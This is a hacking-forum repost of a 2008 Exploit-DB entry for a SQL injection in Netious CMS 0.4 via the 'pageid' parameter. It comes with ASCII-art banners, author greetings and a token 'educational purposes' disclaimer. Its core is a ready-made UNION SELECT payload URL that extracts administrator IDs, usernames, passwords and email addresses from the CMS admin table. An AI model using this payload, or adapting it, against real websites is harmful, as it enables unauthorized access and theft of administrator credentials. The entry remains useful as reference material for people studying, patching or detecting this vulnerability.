Exploit Netious CMS 0.4 - 'pageid' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5661
Проверка EDB
  1. Пройдено
Автор
INJECTOR5
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-2461
Дата публикации
2008-05-21
Код:
                         ||          ||   | ||       
                  o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                 ( :   /    (_)    /           (   .
                   ================================
                      ==========================
                         ====================
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: Netious CMS 0.4 Remote SQL Injection Vulnerability
Author :: InjEctOr [s0f (at) w (dot) cn]
&& ToTaL [n.47 at hotmail.com]
discouvred by :: ToTaL
Application :: Netious CMS 0.4
 
Download :: http://www.netious.com/sections/3/files/netious-cms-serv-0.4.zip
 
Dork 1 ::  Not Yet  :P
 
Greets :: Allah , InjEctOr5 TeaM , TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http://localhost/netious/index.php?pageid='/**/union/**/select/**/1,concat_ws(0x3a3a,AdminId,username,password,adminMail),3+from+mycmsadmin/*
 
-------------------------------------------[End of  context]----------------------------------------

# milw0rm.com [2008-05-21]
 
Источник
www.exploit-db.com

Похожие темы